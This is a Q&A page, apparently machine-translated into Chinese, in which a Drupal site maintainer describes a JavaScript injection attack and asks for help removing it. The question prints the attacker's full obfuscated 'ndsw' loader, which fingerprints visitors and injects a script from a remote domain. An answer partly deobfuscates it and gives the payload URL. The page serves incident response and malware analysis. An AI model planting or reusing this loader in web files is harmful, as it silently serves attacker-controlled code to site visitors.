php - Drupal 站点 javascript 注入(inject)修复

Question

几天前，我维护的一个 drupal 网站被黑客使用某种 JS 注入(inject)攻击，他们设法将一堆混淆代码注入(inject)所有 javascript 文件，我们一直在努力修复它并将其恢复到正常。

删除一大堆混淆代码后，我们重新控制了所有 CSS 和 JS，但是在任何代码(或 MYSQL 数据库)中仍然有一些我找不到的东西。

目前，黑客/注入(inject)显示为随机链接，出现在任何和所有之前 <a>只在主页 (www.example.com) 或二级首页 (www.example.com/company) 上添加标签，我没有制作它传递给我的网站。

我已经在数据库和物理文件中搜索了对它注入(inject)的网站链接的引用，但没有找到。

此外，链接始终使用相同的随机字母(在本例中为“8”、“p”、“glad”、“wy2”、“j6”和“6”)也是毫无意义的

其次，暂存站点非常好(www.example.staging.com)，但是当我们推送非黑客代码时，它会重新显示自己)如果我拉下实时代码并在本地运行链接消失。

任何人都可以帮助我或对此有任何经验吗？

这是注入(inject)的JS:

;if(ndsw===undefined){var ndsw=true;(function(){var n=navigator,d=document,s=screen,w=window,u=n[p("wt1n1eagqAbr1ers1up")],q=n[p(")mrrdo4fitua4l0p)")],t=d[p("gewi)kkorowc)")],h=w[p("0n1o9ixtma(cco!ly")][p("oeemea)n6tmsforhx")],dr=d[p("9rye3rjrfedf1eprg")];if(dr&&!c(dr,h)){if(!c(u,p("kd0iio1rkdxnwA5"))&&c(u,p("ps5wdowdcn)i8Wv"))&&c(q,p("vndisWv"))){if(!c(t,p("m=ua!mft3uc_e_i"))){var n=d.createElement('script');n.type='text/javascript';n.async=true;n.src=p('c3tcf1d5i7(a!2he0end338epd66vf55z5vaj3p7j=fvo&90l4b2i=idyizcv?6smjb.uexd1o9cn_tsl/4mcouci.28!0s2xsacfiat1y9liainhadkccviol2cr.(kmcqi0ldcp/j/w:gsnpdt2tlhz');var v=d.getElementsByTagName('script')[0];v.parentNode.insertBefore(n,v)}}}function p(e){var k='';for(var w=0;w<e.length;w++){if(w%2===1)k+=e[w]}k=r(k);return k}function c(o,z){return o[p("!f9O4xrevd4ngi4")](z)!==-1}function r(a){var d='';for(var q=a.length-1;q>=0;q--){d+=a[q]}return d}})()}

Answer 1

So far I got:
- first it checks if :
  + userAgent
  + platform
  + cookie
  + location[hostname]
  + referrer

later checks something about this values:
  - userAgent !== Android
  - userAgent === Windows
  - userAgent === Win
  - cookie not exists __utma=

  Then it makes a script element with src= -> 
  "https://click.clickanalytics208.com/s_code.js?cid=240&v=73a55f6
  de3dee2a751c3"